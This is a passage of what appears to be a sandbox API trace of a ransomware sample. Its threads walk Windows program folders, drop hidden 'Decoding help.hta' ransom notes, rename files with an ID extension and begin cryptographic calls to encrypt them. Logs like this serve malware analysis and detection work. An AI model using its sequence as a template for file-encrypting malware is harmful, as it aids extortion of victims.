16 [0056.722] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*" [0056.722] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*") returned 60 [0056.722] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\", lpString2="msader15.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" [0056.722] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" [0056.722] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0056.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.722] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0xbdcfd30 | out: lpFindFileData=0xbdcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3080a8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xc60371c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 0 [0056.722] FindClose (in: hFindFile=0x5d8150 | out: hFindFile=0x5d8150) returned 1 Thread: id = 609 os_tid = 0xdc8 [0048.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*", lpFindFileData=0xc31fd30 | out: lpFindFileData=0xc31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3470 [0048.804] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.804] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xc31fd30 | out: lpFindFileData=0xc31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.804] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.804] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.805] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xc31fd30 | out: lpFindFileData=0xc31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xad0454c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xad0454c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 1 [0048.805] lstrcmpW (lpString1=".", lpString2="BIN") returned -1 [0048.805] lstrcmpW (lpString1="..", lpString2="BIN") returned -1 [0048.805] lstrcmpiW (lpString1="windows", lpString2="BIN") returned 1 [0048.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*" [0048.805] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*.*") returned 85 [0048.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\", lpString2="BIN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" [0048.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*.*" [0048.805] GlobalMemoryStatus (in: lpBuffer=0xc31fd10 | out: lpBuffer=0xc31fd10) [0048.805] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c00118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0048.810] CloseHandle (hObject=0x304) returned 1 [0048.810] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xc31fd30 | out: lpFindFileData=0xc31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xad0454c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xad0454c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0048.810] FindClose (in: hFindFile=0x5e3470 | out: hFindFile=0x5e3470) returned 1 Thread: id = 610 os_tid = 0xdcc [0048.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*", lpFindFileData=0xc41fd30 | out: lpFindFileData=0xc41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da278 [0050.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.349] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0xc41fd30 | out: lpFindFileData=0xc41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.349] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.349] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0xc41fd30 | out: lpFindFileData=0xc41fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21282c00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21282c00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x166bae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1FRAR.ITS", cAlternateFileName="")) returned 1 [0050.351] lstrcpyW (in: lpString1=0x25187a68, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*" [0050.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*") returned 68 [0050.351] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\Decoding help.hta" [0050.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\decoding help.hta")) returned 0xffffffff [0050.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x618 [0052.058] WriteFile (in: hFile=0x618, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc41fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc41fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.583] CloseHandle (hObject=0x618) returned 1 [0056.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.525] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1FRAR.ITS") returned -1 [0058.525] lstrlenW (lpString="MSB1FRAR.ITS") returned 12 [0058.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*" [0058.525] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*") returned 68 [0058.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\", lpString2="MSB1FRAR.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" [0058.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" [0058.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" [0058.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbd0 [0061.584] CreateFileMappingA (hFile=0xbd0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x354 [0061.585] CryptAcquireContextA (phProv=0xc41fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 611 os_tid = 0xdd0 [0048.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\*.*", lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3470 [0048.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.811] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.811] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.811] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xc51fd30 | out: lpFindFileData=0xc51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0048.811] FindClose (in: hFindFile=0x5e3470 | out: hFindFile=0x5e3470) returned 1 Thread: id = 612 os_tid = 0xdd4 [0048.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*", lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b10 [0050.584] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.584] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.584] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.584] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.584] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ItemTemplates", cAlternateFileName="ITEMTE~1")) returned 1 [0050.584] lstrcmpW (lpString1=".", lpString2="ItemTemplates") returned -1 [0050.584] lstrcmpW (lpString1="..", lpString2="ItemTemplates") returned -1 [0050.584] lstrcmpiW (lpString1="windows", lpString2="ItemTemplates") returned 1 [0050.587] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*" [0050.587] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*") returned 73 [0050.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\", lpString2="ItemTemplates" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates" [0050.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*" [0050.587] GlobalMemoryStatus (in: lpBuffer=0xcb4fd10 | out: lpBuffer=0xcb4fd10) [0050.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25247d08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x700 [0050.736] CloseHandle (hObject=0x700) returned 1 [0050.736] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ItemTemplates", cAlternateFileName="ITEMTE~1")) returned 0 [0050.736] FindClose (in: hFindFile=0x5d8b10 | out: hFindFile=0x5d8b10) returned 1 Thread: id = 613 os_tid = 0xdd8 [0048.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*", lpFindFileData=0xe44fd30 | out: lpFindFileData=0xe44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3470 [0048.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.816] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xe44fd30 | out: lpFindFileData=0xe44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.816] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.816] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xe44fd30 | out: lpFindFileData=0xe44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0048.816] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0048.816] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0048.816] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0048.816] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" [0048.816] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned 63 [0048.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033" [0048.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*" [0048.816] GlobalMemoryStatus (in: lpBuffer=0xe44fd10 | out: lpBuffer=0xe44fd10) [0048.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9822640, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0048.818] CloseHandle (hObject=0x304) returned 1 [0048.818] FindNextFileW (in: hFindFile=0x5e3470, lpFindFileData=0xe44fd30 | out: lpFindFileData=0xe44fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d3ae00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xe2340dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56d3ae00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x381748, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBE7.DLL", cAlternateFileName="")) returned 1 [0048.818] lstrcpyW (in: lpString1=0x98a2850, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" [0048.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned 63 [0048.818] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\Decoding help.hta" [0048.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\decoding help.hta")) returned 0xffffffff [0048.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0050.384] WriteFile (in: hFile=0x45c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xe44fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xe44fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.540] CloseHandle (hObject=0x45c) returned 1 [0053.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 